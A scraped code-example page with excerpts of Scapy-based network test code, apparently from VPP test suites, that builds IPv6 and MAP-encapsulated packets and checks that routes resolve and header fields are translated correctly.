                IPv6(dst='3000::1', src=map_translated_addr) /
                frags[i], i, 200)
        ]

        self.pg1.add_stream(v6_stream)

        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg0.get_capture(len(frags))

        for r in rx:
            self.assertFalse(r.haslayer(IPv6))
            self.assertEqual(r[IP].src, p[IP].src)
            self.assertEqual(r[IP].dst, p[IP].dst)

        #
        # Pre-resolve. No API for this!!
        #
        self.vapi.ppcli("map params pre-resolve ip6-nh 4001::1")

        self.send_and_assert_no_replies(self.pg0, v4,
                                        "resolved via default route")

        #
        # Add a route to 4001::1. Expect the encapped traffic to be
        # sent via that routes next-hop
        #
        pre_res_route = VppIpRoute(
            self, "4001::1", 128,
            [VppRoutePath(self.pg1.remote_hosts[2].ip6, self.pg1.sw_if_index)])
        pre_res_route.add_vpp_config()

        self.send_and_assert_encapped_one(v4,
                                          "3000::1",
                                          map_translated_addr,
                                          dmac=self.pg1.remote_hosts[2].mac)

        #
        # change the route to the pre-solved next-hop
        #
        pre_res_route.modify(
            [VppRoutePath(self.pg1.remote_hosts[3].ip6, self.pg1.sw_if_index)])
        pre_res_route.add_vpp_config()

        self.send_and_assert_encapped_one(v4,
                                          "3000::1",
                                          map_translated_addr,
                                          dmac=self.pg1.remote_hosts[3].mac)

        #
        # cleanup. The test infra's object registry will ensure
        # the route is really gone and thus that the unresolve worked.
        #
        pre_res_route.remove_vpp_config()
        self.vapi.ppcli("map params pre-resolve del ip6-nh 4001::1")
コード例 #29
0
 def ns_req(cls, src_host, host):
     nsma = in6_getnsma(inet_pton(AF_INET6, "fd10::ffff"))
     d = inet_ntop(AF_INET6, nsma)
     return (Ether(dst="ff:ff:ff:ff:ff:ff", src=src_host.mac) /
             IPv6(dst=d, src=src_host.ip6) / ICMPv6ND_NS(tgt=host.ip6) /
             ICMPv6NDOptSrcLLAddr(lladdr=src_host.mac))
コード例 #30
0
def main():  # pylint: disable=too-many-statements, too-many-locals
    """Main function of the script file."""
    args = TrafficScriptArg([
        'tx_dst_mac', 'tx_src_mac', 'tx_dst_ipv6', 'tx_src_ipv6',
        'tx_dst_ipv4', 'tx_src_ipv4', 'tx_src_udp_port', 'rx_dst_mac',
        'rx_src_mac'
    ])
    rx_if = args.get_arg('rx_if')
    tx_if = args.get_arg('tx_if')
    tx_src_mac = args.get_arg('tx_src_mac')
    tx_dst_mac = args.get_arg('tx_dst_mac')
    tx_dst_ipv6 = args.get_arg('tx_dst_ipv6')
    tx_src_ipv6 = args.get_arg('tx_src_ipv6')
    tx_dst_ipv4 = args.get_arg('tx_dst_ipv4')
    tx_src_ipv4 = args.get_arg('tx_src_ipv4')
    tx_src_udp_port = int(args.get_arg('tx_src_udp_port'))
    tx_dst_udp_port = 20000
    rx_dst_mac = args.get_arg('rx_dst_mac')
    rx_src_mac = args.get_arg('rx_src_mac')

    rxq = RxQueue(rx_if)
    txq = TxQueue(tx_if)
    sent_packets = []

    # Create empty UDP datagram in IPv4 and IPv6
    tx_pkt = (Ether(dst=tx_dst_mac, src=tx_src_mac) /
              IPv6(src=tx_src_ipv6, dst=tx_dst_ipv6) /
              IP(src=tx_src_ipv4, dst=tx_dst_ipv4) /
              UDP(sport=tx_src_udp_port, dport=tx_dst_udp_port))

    txq.send(tx_pkt)
    sent_packets.append(tx_pkt)

    for _ in range(5):
        pkt = rxq.recv(2)
        if _is_udp_in_ipv4(pkt):
            ether = pkt
            break
    else:
        raise RuntimeError("UDP in IPv4 Rx error.")

    # check ethernet
    if ether.dst != rx_dst_mac:
        raise RuntimeError("Destination MAC error {} != {}.".format(
            ether.dst, rx_dst_mac))
    print "Destination MAC: OK."

    if ether.src != rx_src_mac:
        raise RuntimeError("Source MAC error {} != {}.".format(
            ether.src, rx_src_mac))
    print "Source MAC: OK."

    ipv4 = ether.payload

    # check ipv4
    if ipv4.dst != tx_dst_ipv4:
        raise RuntimeError("Destination IPv4 error {} != {}.".format(
            ipv4.dst, tx_dst_ipv4))
    print "Destination IPv4: OK."

    if ipv4.src != tx_src_ipv4:
        raise RuntimeError("Source IPv4 error {} != {}.".format(
            ipv4.src, tx_src_ipv4))
    print "Source IPv4: OK."

    if ipv4.proto != 17:  # UDP
        raise RuntimeError("IPv4 protocol error {} != UDP.".format(ipv4.proto))
    print "IPv4 protocol: OK."

    udp = ipv4.payload

    # check udp
    if udp.dport != tx_dst_udp_port:
        raise RuntimeError("UDP dport error {} != {}.".format(
            udp.dport, tx_dst_udp_port))
    print "UDP dport: OK."

    if udp.sport != tx_src_udp_port:
        raise RuntimeError("UDP sport error {} != {}.".format(
            udp.sport, tx_src_udp_port))
    print "UDP sport: OK."

    sys.exit(0)